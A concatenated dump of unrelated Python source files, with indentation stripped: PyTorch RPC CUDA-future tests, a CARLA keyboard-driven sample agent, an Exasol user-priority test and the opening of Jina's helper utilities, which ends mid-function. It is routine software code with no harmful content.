# As a plus, we test that futures still invoke callbacks even in case of
# error, and that the child futures are successful if those callbacks
# don't access the parent future.
def cb(fut):
with torch.cuda.device("cuda:1"):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor1.fill_(1)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with self.assertRaisesRegex(
ValueError,
r"The result contained tensors residing on device\(s\) cuda:0 "
r"which are not among the expected device\(s\) cuda:1",
):
parent_future.wait()
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(1)
def test_async_execution_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
t = torch.zeros((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_sleep_and_set_to_one, args=(t,))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 1).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_async_execution_nested_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
nested_dst = worker_name((self.rank + 2) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
a = torch.ones((100,), device="cuda:0")
b = torch.ones((100,), device="cuda:0")
c = torch.ones((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_nested_add, args=(nested_dst, a, b, c))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 3).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_modify_tensor_inplace(self):
tensor = torch.zeros((100,), device="cuda:0")
future = Future(devices=["cuda:0"])
future.set_result(tensor)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
tensor.fill_(1)
future.wait()
@skip_if_lt_x_gpu(1)
def test_cuda_future_replace_tensor(self):
tensor_list = [torch.zeros((100,), device="cuda:0")]
future = Future(devices=["cuda:0"])
future.set_result(tensor_list)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
# We set things up so that the original tensor contained in the list
# gets deleted once we replace it with the other one. This will
# invalidate any cached information held by the future.
tensor_list[0] = torch.ones((100,), device="cuda:0")
future.wait()
@skip_if_lt_x_gpu(1)
def test_rref_with_unpickleable_attributes(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(dst, TensorWrapper, args=(torch.zeros(42, device="cuda:0"),))
rref.rpc_sync().increase(1)
ret = rref.rpc_sync().sum()
self.assertEqual(ret, 42)
rpc.shutdown()
|
track_4_sample_agent.py
|
#!/usr/bin/env python
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""
This module provides an example for a Track4 agent to control the ego vehicle via keyboard
"""
from threading import Thread
import math
import sys
import time
try:
import pygame
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
import carla
from srunner.challenge.autoagents.autonomous_agent import AutonomousAgent, Track
from srunner.challenge.autoagents.human_agent import KeyboardControl
if sys.version_info >= (3, 3):
import shutil
def print_over_same_line(text):
"""
Refresh text line
"""
terminal_width = shutil.get_terminal_size((80, 20)).columns
empty_space = max(0, terminal_width - len(text))
sys.stdout.write('\r' + text + empty_space * ' ')
sys.stdout.flush()
else:
# Workaround for older Python versions.
def print_over_same_line(text):
"""
Refresh text line
"""
line_length = max(print_over_same_line.last_line_length, len(text))
empty_space = max(0, line_length - len(text))
sys.stdout.write('\r' + text + empty_space * ' ')
sys.stdout.flush()
print_over_same_line.last_line_length = line_length
print_over_same_line.last_line_length = 0
def distance_vehicle(waypoint, vehicle_position):
"""
Calculate distance between waypoint and vehicle position
"""
dx = waypoint[0] - vehicle_position[0]
dy = waypoint[1] - vehicle_position[1]
dz = waypoint[2] - vehicle_position[2]
return math.sqrt(dx * dx + dy * dy + dz * dz)
def get_closest_waypoint(gps_position, scene_layout):
"""
Get closest waypoint to current gps position
"""
min_dist = 10000
closest_way_id = None
for waypoint_id, waypoint_data in scene_layout.items():
current_waypoint_distance = distance_vehicle(waypoint_data['position'], gps_position)
if current_waypoint_distance < min_dist:
closest_way_id = waypoint_id
min_dist = current_waypoint_distance
return closest_way_id, min_dist
class HumanTextInterface(object):
"""
Class to control a vehicle manually for debugging purposes
"""
def __init__(self, parent):
self.quit = False
self._parent = parent
self._width = 800
self._height = 600
self._throttle_delta = 0.05
self._steering_delta = 0.01
pygame.init()
pygame.font.init()
self._clock = pygame.time.Clock()
self._display = pygame.display.set_mode((self._width, self._height), pygame.HWSURFACE | pygame.DOUBLEBUF)
pygame.display.set_caption("Track4 Sample Agent")
def run(self):
"""
Run the GUI
"""
while not self._parent.agent_engaged:
time.sleep(0.5)
controller = KeyboardControl()
input_data = self._parent.sensor_interface.get_data()
# agent is engaged. Take the closest waypoint.
closest_waypoint, distance = get_closest_waypoint(input_data['GPS'][1],
input_data['scene_layout'][1])
# We navigate now iterating from this
while not self.quit:
self._clock.tick_busy_loop(20)
controller.parse_events(self._parent.current_control, self._clock)
# Process events
pygame.event.pump() # to get all the keyboard control
# process sensor data
input_data = self._parent.sensor_interface.get_data()
# merge your position with the input data and inform the client
# Your position
print("Closest waypoint id is ", closest_waypoint, ' Dist ', distance)
pygame.quit()
class Track4SampleAgent(AutonomousAgent):
"""
THis is a human controlled agent with track 4 access for testing
"""
current_control = None
agent_engaged = False
def setup(self, path_to_conf_file):
"""
Setup the agent parameters
"""
self.track = Track.SCENE_LAYOUT
self.agent_engaged = False
self.current_control = carla.VehicleControl()
self.current_control.steer = 0.0
self.current_control.throttle = 1.0
self.current_control.brake = 0.0
self.current_control.hand_brake = False
self._hic = HumanTextInterface(self)
self._thread = Thread(target=self._hic.run)
self._thread.start()
def sensors(self):
"""
Define the sensor suite required by the agent
:return: a list containing the required sensors in the following format:
"""
sensors = [
{'type': 'sensor.other.gnss', 'x': 0.7, 'y': -0.4, 'z': 1.60, 'id': 'GPS'},
{'type': 'sensor.scene_layout', 'id': 'scene_layout'},
{'type': 'sensor.object_finder', 'reading_frequency': 20, 'id': 'object_finder'},
]
return sensors
def run_step(self, input_data, timestamp):
"""
Execute one step of navigation.
"""
self.agent_engaged = True
return self.current_control
def destroy(self):
"""
Cleanup
"""
self._hic.quit = True
self._thread.join()
|
modify_priority.py
|
# -*- coding: utf-8 -*-
#!/usr/opt/bs-python-2.7/bin/python
#SPOT-2234
import os
import sys
import unittest
import time
import threading
import Queue
sys.path.append(os.path.realpath(__file__ + '/../../../lib'))
import udf
from udf import requires
import exatest
class VisiblePriorityModificationTest(udf.TestCase):
# queue = Queue.Queue(0)
def setUp(self):
# create table
self.query('DROP SCHEMA IF EXISTS TEST_SCHEMA CASCADE')
self.query('CREATE SCHEMA TEST_SCHEMA')
self.query('CREATE TABLE t1 (name VARCHAR(10), nr INTEGER PRIMARY KEY)')
self.query("""INSERT INTO t1 VALUES ('u0', 0), ('u1', 1), ('u2', 2), ('u3', 3), ('u4', 4), ('u5', 5), ('u6', 6), ('u7', 7), ('u8', 8), ('u9', 9), ('u10', 10), ('u11', 11), ('u12', 12), ('u13', 13), ('u14', 14), ('u15', 15), ('u16', 16), ('u17', 17), ('u18', 18), ('u19', 19), ('u20', 20)""")
self.commit()
# create users with default priority MEDIUM
self.createUser('U1', "u1")
self.createUser('U2', "u2")
def tearDown(self):
# cleanup users
self.query('DROP USER U1')
self.query('DROP USER U2')
# drop t1
self.query('OPEN SCHEMA TEST_SCHEMA')
self.query('DROP TABLE t1')
self.query('DROP SCHEMA TEST_SCHEMA')
def getConnection(self, username, password):
client = exatest.ODBCClient('exatest')
self.log.debug('connecting to DSN "exa" for user {username}'.format(username=username))
client.connect(uid = username, pwd = password)
return client
def createUser(self, username, password):
self.query('DROP USER IF EXISTS {username} CASCADE'.format(username=username) )
self.query('CREATE USER {username} IDENTIFIED BY "{password}"'.format(username = username, password = password))
# grant for user
self.query('GRANT CREATE SESSION TO {username}'.format(username=username))
self.query('GRANT SELECT ANY TABLE TO {username}'.format(username=username))
self.query('GRANT SELECT, DELETE, UPDATE ON TABLE t1 TO {username}'.format(username=username))
# default priority is MEDIUM
self.setPriority(username, 'MEDIUM')
self.commit()
def setPriority(self,username, priority):
self.query('GRANT PRIORITY {priority} TO {username}'.format(priority=priority, username=username))
# return dictionary with username and priority, order by username ASC
def mappedgetPriorityFromEXA_ALL_SESSIONS(self):
result = self.query("""SELECT USER_NAME, PRIORITY FROM EXA_ALL_SESSIONS""")
priorities = {}
for row in result:
priorities[row[0]] = row[1]
return priorities
# return dictionary with username and weight, order by username asc
def mappedgetWeightFromEXA_RM_PROCESS_STATES(self):
result = self.query("""SELECT USER_NAME, R.WEIGHT FROM "$EXA_SESSIONS_BASE" S, "$EXA_RM_PROCESS_STATES" R WHERE R.SESSION_ID = S.SESSION_ID""")
weights = {}
for row in result:
weights[row[0]] = row[1]
return weights
def userSessionTwoUsers(self, conn, username, queue):
# execute select on t1 for several times
conn.query('OPEN SCHEMA TEST_SCHEMA')
conn.query('ALTER SESSION SET QUERY_TIMEOUT=5')
queue.get()
conn.query('SELECT COUNT(*) from T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1')
def userSessionOneUser(self, conn, username, queue):
conn.query('OPEN SCHEMA TEST_SCHEMA')
conn.query('ALTER SESSION SET QUERY_TIMEOUT=5')
item = queue.get()
conn.query('SELECT COUNT(*) from T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1')
item = queue.get()
conn.query('SELECT COUNT(*) from T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1')
item = queue.get()
conn.query('SELECT COUNT(*) from T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1')
def testPriorityTwoUsers(self):
queue1 = Queue.Queue(0)
queue2 = Queue.Queue(0)
# create connections and threads for U1 and U2
connectionu1= self.getConnection('U1', "u1")
connectionu2= self.getConnection('U2', "u2")
userThread1 = threading.Thread(target=self.userSessionTwoUsers, args = (connectionu1,"U1", queue1))
userThread2 = threading.Thread(target=self.userSessionTwoUsers, args = (connectionu2,"U2", queue2))
# start
userThread1.start()
userThread2.start()
queue1.put("item")
queue2.put("item")
# modify priority 1
self.setPriority('U2', "LOW")
self.setPriority('U1', "HIGH")
self.commit()
loopCount = 0
priorsOk = False
weightsOk = False
while True:
if(priorsOk == False):
priors = self.mappedgetPriorityFromEXA_ALL_SESSIONS()
if(weightsOk == False):
weights = self.mappedgetWeightFromEXA_RM_PROCESS_STATES()
if(loopCount > 30):
print("timeout")
break
loopCount = loopCount + 1
if(priorsOk == True and weightsOk == True):
break
else:
if(weights['U1'] != None and weights['U2'] != None):
weightsOk = True
if(priors['U1'] == 'HIGH' and priors['U2'] == 'LOW'):
priorsOk = True
if(priorsOk != True):
print("priors not yet ok: " + str(priors))
if(weightsOk != True):
print("weights not yet ok" + str(weights))
if(priorsOk != True or weightsOk != True):
time.sleep(0.1)
continue
self.assertTrue(priors.has_key('U1'))
self.assertEqual(priors['U1'], 'HIGH')
self.assertTrue(priors.has_key('U2'))
self.assertEqual(priors['U2'], 'LOW')
weightsSum = weights['U1'] + weights['U2'] + weights['SYS']
self.assertTrue(weightsSum <= 101 or weightsSum >= 99)
# join
userThread1.join()
userThread2.join()
connectionu1.rollback()
connectionu1.close()
connectionu2.rollback()
connectionu2.close()
def testPriorityOneUser(self):
queue = Queue.Queue(0)
connectionu1= self.getConnection('U1', "u1")
userThread = threading.Thread(target=self.userSessionOneUser, args = (connectionu1,"U1", queue))
userThread.start()
# get priors and weights in Query 1
queue.put("item")
time.sleep(1)
loopCount = 0
priorsOk = False
weightsOk = False
while True:
if(priorsOk == False):
priors1 = self.mappedgetPriorityFromEXA_ALL_SESSIONS()
if(weightsOk == False):
weights1 = self.mappedgetWeightFromEXA_RM_PROCESS_STATES()
if(loopCount >= 10):
print("timeout...")
break
loopCount = loopCount + 1
if(priorsOk == True and weightsOk == True):
break
else:
if(weights1.has_key('U1') or weights1['U1'] != None):
weightsOk = True
if(priors1.has_key('U1')):
priorsOk = True
if(priorsOk != True):
print("priors1 not yet ok: " + str(priors1))
if(weightsOk != True):
print("weights1 not yet ok: " + str(weights1))
if(priorsOk != True or weightsOk != True):
time.sleep(0.1)
continue
# assertions
self.assertTrue(priors1.has_key('U1'))
self.assertEqual(priors1['U1'], 'MEDIUM')
self.assertTrue(weights1.has_key('U1'))
weightsSum = weights1['U1'] + weights1['SYS']
self.assertTrue( weightsSum <= 101 or weightsSum >= 99)
# get priors and weights in Query 2 first time
queue.put("item")
loopCount = 0
priorsOk = False
weightsOk = False
while True:
if(priorsOk == False):
priors2 = self.mappedgetPriorityFromEXA_ALL_SESSIONS()
if(weightsOk == False):
weights2 = self.mappedgetWeightFromEXA_RM_PROCESS_STATES()
if(loopCount >= 10):
print("timeout...")
break
loopCount = loopCount + 1
if(priorsOk == True and weightsOk == True):
break
else:
if(weights2.has_key('U1')):
weightsOk = True
if(priors2['U1'] == 'MEDIUM'):
priorsOk = True
if(priorsOk != True):
print("priors2 not yet ok: " + str(priors2))
if(weightsOk != True):
print("weights2 not yet ok: " + str(weights2))
if(priorsOk != True or weightsOk != True):
time.sleep(0.1)
continue
# assertions
self.assertTrue(priors2.has_key('U1'))
self.assertEqual(priors2['U1'], 'MEDIUM')
self.assertTrue(weights2.has_key('U1'))
weightsSum = weights2['U1'] + weights2['SYS']
self.assertTrue( weightsSum <= 101 or weightsSum >= 99)
self.assertEqual(priors1, priors2)
self.assertEqual(weights1, weights2)
# modify priority U1
self.setPriority('U1', "LOW")
self.commit()
# get priors and weights in Query 2 second time
loopCount = 0
priorsOk = False
weightsOk = False
while True:
if(priorsOk == False):
priors3 = self.mappedgetPriorityFromEXA_ALL_SESSIONS()
if(weightsOk == False):
weights3 = self.mappedgetWeightFromEXA_RM_PROCESS_STATES()
if(loopCount >= 10):
print("timeout...")
break
loopCount = loopCount + 1
if(priorsOk == True and weightsOk == True):
break
else:
if(weights3.has_key('U1')):
weightsOk = True
if(priors3['U1'] == 'LOW'):
priorsOk = True
if(priorsOk != True):
print("priors3 not yet ok: " + str(priors3))
if(weightsOk != True):
print("weights3 not yet ok: " + str(weights3))
if(priorsOk != True or weightsOk != True):
time.sleep(0.1)
continue
# assertions
self.assertTrue(priors3.has_key('U1'))
self.assertEqual(priors3['U1'], 'LOW')
self.assertTrue(weights3.has_key('U1'))
weightsSum = weights3['U1'] + weights3['SYS']
self.assertTrue( weightsSum <= 101 or weightsSum >= 99)
self.assertNotEqual(priors2, priors3)
self.assertNotEqual(weights2, weights3)
# get priors and weights in Query 3
queue.put("item")
loopCount = 0
priorsOk = False
weightsOk = False
while True:
if(priorsOk == False):
priors4 = self.mappedgetPriorityFromEXA_ALL_SESSIONS()
if(weightsOk == False):
weights4 = self.mappedgetWeightFromEXA_RM_PROCESS_STATES()
if(loopCount >= 10):
print("timeout...")
break
loopCount = loopCount + 1
if(priorsOk == True and weightsOk == True):
break
else:
if(weights4.has_key('U1')):
weightsOk = True
if(priors4['U1'] == 'LOW'):
priorsOk = True
if(priorsOk != True):
print("priors4 not yet ok: " + str(priors4))
if(weightsOk != True):
print("weights4 not yet ok: " + str(weights4))
if(priorsOk != True or weightsOk != True):
time.sleep(0.1)
continue
# assertions
self.assertTrue(priors4.has_key('U1'))
self.assertEqual(priors4['U1'], 'LOW')
self.assertTrue(weights4.has_key('U1'))
weightsSum = weights4['U1'] + weights4['SYS']
self.assertTrue( weightsSum <= 101 or weightsSum >= 99)
self.assertEqual(priors3, priors4)
self.assertEqual(weights3, weights4)
userThread.join()
connectionu1.rollback()
connectionu1.close()
if __name__ == '__main__':
udf.main()
|
helper.py
|
import asyncio
import functools
import json
import math
import os
import random
import re
import sys
import threading
import time
import uuid
import warnings
from argparse import ArgumentParser, Namespace
from datetime import datetime
from itertools import islice
from types import SimpleNamespace
from typing import (
Tuple,
Optional,
Iterator,
Any,
Union,
List,
Dict,
Set,
Sequence,
Iterable,
)
__all__ = [
'batch_iterator',
'parse_arg',
'random_port',
'random_identity',
'random_uuid',
'expand_env_var',
'colored',
'ArgNamespace',
'is_valid_local_config_source',
'cached_property',
'typename',
'get_public_ip',
'get_internal_ip',
'convert_tuple_to_list',
'run_async',
'deprecated_alias',
'countdown',
'CatchAllCleanupContextManager',
'download_mermaid_url',
'get_readable_size',
'get_or_reuse_loop',
]
def deprecated_alias(**aliases):
"""
Usage, kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
With level 0 means warning, level 1 means exception.
For example:
.. highlight:: python
.. code-block:: python
@deprecated_alias(input_fn=('inputs', 0), buffer=('input_fn', 0), callback=('on_done', 1), output_fn=('on_done', 1))
:param aliases: maps aliases to new arguments
:return: wrapper
"""
from .excepts import NotSupportedError
def _rename_kwargs(func_name: str, kwargs, aliases):
"""
Raise warnings or exceptions for deprecated arguments.
:param func_name: Name of the function.
:param kwargs: key word arguments from the function which is decorated.
:param aliases: kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
"""
for alias, new_arg in aliases.items():
if not isinstance(new_arg, tuple):
raise ValueError(
f'{new_arg} must be a tuple, with first element as the new name, '
f'second element as the deprecated level: 0 as warning, 1 as exception'
)
if alias in kwargs:
new_name, dep_level = new_arg
if new_name in kwargs:
raise NotSupportedError(
f'{func_name} received both {alias} and {new_name}'
)
if dep_level == 0:
warnings.warn(
f'`{alias}` is renamed to `{new_name}` in `{func_name}()`, the usage of `{alias}` is '
f'deprecated and will be removed in the next version.',
DeprecationWarning,
)
kwargs[new_name] = kwargs.pop(alias)
elif dep_level == 1:
raise NotSupportedError(f'{alias} has been renamed to `{new_name}`')
def deco(f):
"""
Set Decorator function.
:param f: function the decorator is used for
:return: wrapper
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
"""
Set wrapper function.
:param args: wrapper arguments
:param kwargs: wrapper key word arguments
:return: result of renamed function.
"""
_rename_kwargs(f.__name__, kwargs, aliases)
return f(*args, **kwargs)
return wrapper
return deco
def get_readable_size(num_bytes: Union[int, float]) -> str:
"""
Transform the bytes into readable value with different units (e.g. 1 KB, 20 MB, 30.1 GB).
:param num_bytes: Number of bytes.
:return: Human readable string representation.
"""
num_bytes = int(num_bytes)
if num_bytes < 1024:
return f'{num_bytes} Bytes'
elif num_bytes < 1024 ** 2:
return f'{num_bytes / 1024:.1f} KB'
elif num_bytes < 1024 ** 3:
return f'{num_bytes / (1024 ** 2):.1f} MB'
else:
return f'{num_bytes / (1024 ** 3):.1f} GB'
def batch_iterator(
data: Iterable[Any],
batch_size: int,
axis: int = 0,
) -> Iterator[Any]:
"""
Get an iterator of batches of data.
For example:
.. highlight:: python
.. code-block:: python
for req in batch_iterator(data, batch_size, split_over_axis):
# Do something with batch
:param data: Data source.
:param batch_size: Size of one batch.
:param axis: Determine which axis to iterate for np.ndarray data.
:yield: data
:return: An Iterator of batch data.
"""
import numpy as np
if not batch_size or batch_size <= 0:
yield data
return
if isinstance(data, np.ndarray):
_l = data.shape[axis]
_d = data.ndim
sl = [slice(None)] * _d
if batch_size >= _l:
yield data
return
for start in range(0, _l, batch_size):
end = min(_l, start + batch_size)
sl[axis] = slice(start, end)
yield data[tuple(sl)]
elif isinstance(data, Sequence):
if batch_size >= len(data):
yield data
return
for _ in range(0, len(data), batch_size):
yield data[_ : _ + batch_size]
elif isinstance(data, Iterable):
# as iterator, there is no way to know the length of it
while True:
chunk = tuple(islice(data, batch_size))
if not chunk:
return
yield chunk
else:
raise TypeError(f'unsupported type: {type(data)}')
def parse_arg(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Parse the arguments from string to `Union[bool, int, str, list, float]`.
:param v: The string of arguments
:return: The parsed arguments list.
"""
m = re.match(r'^[\'"](.*)[\'"]$', v)
if m:
return m.group(1)
if v.startswith('[') and v.endswith(']'):
# function args must be immutable tuples not list
tmp = v.replace('[', '').replace(']', '').strip().split(',')
if len(tmp) > 0:
return [parse_arg(vv.strip()) for vv in tmp]
else:
return []
try:
v = int(v) # parse int parameter
except ValueError:
try:
v = float(v) # parse float parameter
except ValueError:
if len(v) == 0:
# ignore it when the parameter is empty
v = None
elif v.lower() == 'true': # parse boolean parameter
v = True
elif v.lower() == 'false':
v = False
return v
def countdown(t: int, reason: str = 'I am blocking this thread') -> None:
"""
Display the countdown in console.
For example:
.. highlight:: python
.. code-block:: python
countdown(10, reason=colored('re-fetch access token', 'cyan', attrs=['bold', 'reverse']))
:param t: Countdown time.
:param reason: A string message of reason for this Countdown.
"""
try:
sys.stdout.write('\n')
sys.stdout.flush()
while t > 0:
t -= 1
msg = f'⏳ {colored("%3d" % t, "yellow")}s left: {reason}'
sys.stdout.write(f'\r{msg}')
sys.stdout.flush()
time.sleep(1)
sys.stdout.write('\n')
sys.stdout.flush()
except KeyboardInterrupt:
sys.stdout.write('no more patience? good bye!')
_random_names = (
(
'first',
'great',
'local',
'small',
'right',
'large',
'young',
'early',
'major',
'clear',
'black',
'whole',
'third',
'white',
'short',
'human',
'royal',
'wrong',
'legal',
'final',
'close',
'total',
'prime',
'happy',
'sorry',
'basic',
'aware',
'ready',
'green',
'heavy',
'extra',
'civil',
'chief',
'usual',
'front',
'fresh',
'joint',
'alone',
'rural',
'light',
'equal',
'quiet',
'quick',
'daily',
'urban',
'upper',
'moral',
'vital',
'empty',
'brief',
),
(
'world',
'house',
'place',
'group',
'party',
'money',
'point',
'state',
'night',
'water',
'thing',
'order',
'power',
'court',
'level',
'child',
'south',
'staff',
'woman',
'north',
'sense',
'death',
'range',
'table',
'trade',
'study',
'other',
'price',
'class',
'union',
'value',
'paper',
'right',
'voice',
'stage',
'light',
'march',
'board',
'month',
'music',
'field',
'award',
'issue',
'basis',
'front',
'heart',
'force',
'model',
'space',
'peter',
),
)
def random_name() -> str:
"""
Generate a random name from list.
:return: A Random name.
"""
return '_'.join(random.choice(_random_names[j]) for j in range(2))
def random_port() -> Optional[int]:
"""
Get a random available port number from '49153' to '65535'.
:return: A random port.
"""
import threading
import multiprocessing
from contextlib import closing
import socket
def _get_port(port=0):
with multiprocessing.Lock():
with threading.Lock():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
try:
s.bind(('', port))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
except OSError:
pass
_port = None
if 'JINA_RANDOM_PORT_MIN' in os.environ or 'JINA_RANDOM_PORT_MAX' in os.environ:
min_port = int(os.environ.get('JINA_RANDOM_PORT_MIN', '49153'))
max_port = int(os.environ.get('JINA_RANDOM_PORT_MAX', '65535'))
all_ports = list(range(min_port, max_port + 1))
random.shuffle(all_ports)
for _port in all_ports:
if _get_port(_port) is not None:
break
else:
raise OSError(
f'can not find an available port between [{min_port}, {max_port}].'
)
else:
_port = _get_port()
return int(_port)
def random_identity(use_uuid1: bool = False) -> str:
"""
Generate random UUID.
..note::
A MAC address or time-based ordering (UUID1) can afford increased database performance, since it's less work
to sort numbers closer-together than those distributed randomly (UUID4) (see here).
A second related issue, is that using UUID1 can be useful in debugging, even if origin data is lost or not
explicitly stored.
:param use_uuid1: use UUID1 instead of UUID4. This is the default Document ID generator.
:return: A random UUID.
"""
return str(random_uuid(use_uuid1))
def random_uuid(use_uuid1: bool = False) -> uuid.UUID:
"""
Get a random UUID.
:param use_uuid1: Use UUID1 if True, else use UUID4.
:return: A random UUID.
"""
return uuid.uuid1() if use_uuid1 else uuid.uuid4()
def expand_env_var(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Expand the environment variables.
:param v: String of environment variables.
:return: Parsed environment variables.
"""
if isinstance(v, str):
return parse_arg(os.path.expandvars(v))
else:
return v
def expand_dict(
d: Dict, expand_fn=expand_env_var, resolve_cycle_ref=True
) -> Dict[str, Any]:
"""
Expand variables from YAML file.
:param d: Target Dict.
:param expand_fn: Parsed environment variables.
:param resolve_cycle_ref: Defines if cyclic references should be resolved.
:return: Expanded variables.
"""
expand_map = SimpleNamespace()
pat = re.compile(r'{.+}|\$[a-zA-Z0-9_]*\b')
def _scan(sub_d: Union[Dict, List], p):
if isinstance(sub_d, dict):
for k, v in sub_d.items():
if isinstance(v, dict):
p.__dict__[k] = SimpleNamespace()
_scan(v, p.__dict__[k])
elif isinstance(v, list):
p.__dict__[k] = list()
_scan(v, p.__dict__[k])
else:
p.__dict__[k] = v
elif isinstance(sub_d, list):
for idx, v in enumerate(sub_d):
if isinstance(v, dict):
p.append(SimpleNamespace())
_scan(v, p[idx])
elif isinstance(v, list):
p.append(list())
_scan(v, p[idx])
else:
p.append(v)
def _replace(sub_d: Union[Dict, List], p):
if isinstance(sub_d, Dict):
for k, v in sub_d.items():
if isinstance(v, (dict, list)):
_replace(v, p.__dict__[k])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[k] = _sub(v, p)
elif isinstance(sub_d, List):
for idx, v in enumerate(sub_d):
if isinstance(v, (dict, list)):
_replace(v, p[idx])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[idx] = _sub(v, p)
def _sub(v, p):
if resolve_cycle_ref:
try:
v = v.format(root=expand_map, this=p)
except KeyError:
pass
return expand_fn(v)
_scan(d, expand_map)
_replace(d, expand_map)
return d
_ATTRIBUTES = {
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8,
}
_HIGHLIGHTS = {
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47,
}
_COLORS = {
'black': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
}
_RESET = '\033[0m'
if os.name == 'nt':
os.system('color')
def colored(
text: str,
color: Optional[str] = None,
on_color: Optional[str] = None,
attrs: Optional[Union[str, list]] = None,
) -> str:
"""
Give the text with color.
:param text: The target text.
:param color: The color of text. Chosen from the following.
{
'grey': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37
}
:param on_color: The on_color of text. Chosen from the following.
{
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47
}
:param attrs: Attributes of color. Chosen from the following.
{
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8
}
:return: Colored text.
"""
if 'JINA_LOG_NO_COLOR' not in os.environ:
fmt_str = '\033[%dm%s'
if color:
text = fmt_str % (_COLORS[color], text)
if on_color:
text = fmt_str % (_HIGHLIGHTS[on_color], text)
if attrs:
if isinstance(attrs, str):
attrs = [attrs]
if isinstance(attrs, list):
for attr in attrs:
text = fmt_str % (_ATTRIBUTES[attr], text)
text += _RESET
return text
class ColorContext:
def __init__(self, color: str, bold: Optional[bool] = False):
self._color = color
self._bold = bold
def __enter__(self):
if self._bold:
fmt_str = '\033[1;%dm'
else:
fmt_str = '\033[0;%dm'
c = fmt_str % (_COLORS[self._color])
print(c, flush=True, end='')
return self
def __exit__(self, typ, value, traceback):
print(_RESET, flush=True, end='')
class ArgNamespace:
"""Helper function for argparse.Namespace object."""
@staticmethod
def kwargs2list(kwargs: Dict) -> List[str]:
"""
Convert dict to an argparse-friendly list.
:param kwargs: dictionary of key-values to be converted
:return: argument list
"""
args = []
from .executors import BaseExecutor
for k, v in kwargs.items():
k = k.replace('_', '-')
if v is not None:
if isinstance(v, bool):
if v:
args.append(f'--{k}')
elif isinstance(v, list): # for nargs
args.extend([f'--{k}', *(str(vv) for vv in v)])
elif isinstance(v, dict):
args.extend([f'--{k}', json.dumps(v)])
elif isinstance(v, type) and issubclass(v, BaseExecutor):
args.extend([f'--{k}', v.__name__])
else:
args.extend([f'--{k}', str(v)])
return args
@staticmethod
def kwargs2namespace(
kwargs: Dict[str, Union[str, int, bool]], parser: ArgumentParser
) -> Namespace:
"""
Convert dict to a namespace.
:param kwargs: dictionary of key-values to be converted
:param parser: the parser for building kwargs into a namespace
:return: argument list
"""
args = ArgNamespace.kwargs2list(kwargs)
try:
p_args, unknown_args = parser.parse_known_args(args)
except SystemExit:
raise ValueError(
f'bad arguments "{args}" with parser {parser}, '
'you may want to double check your args '
)
return p_args
@staticmethod
def get_non_defaults_args(
args: Namespace, parser: ArgumentParser, taboo: Optional[Set[str]] = None
) -> Dict:
"""
Get non-default args in a dict.
:param args: the namespace to parse
:param parser: the parser for referring the default values
:param taboo: exclude keys in the final result
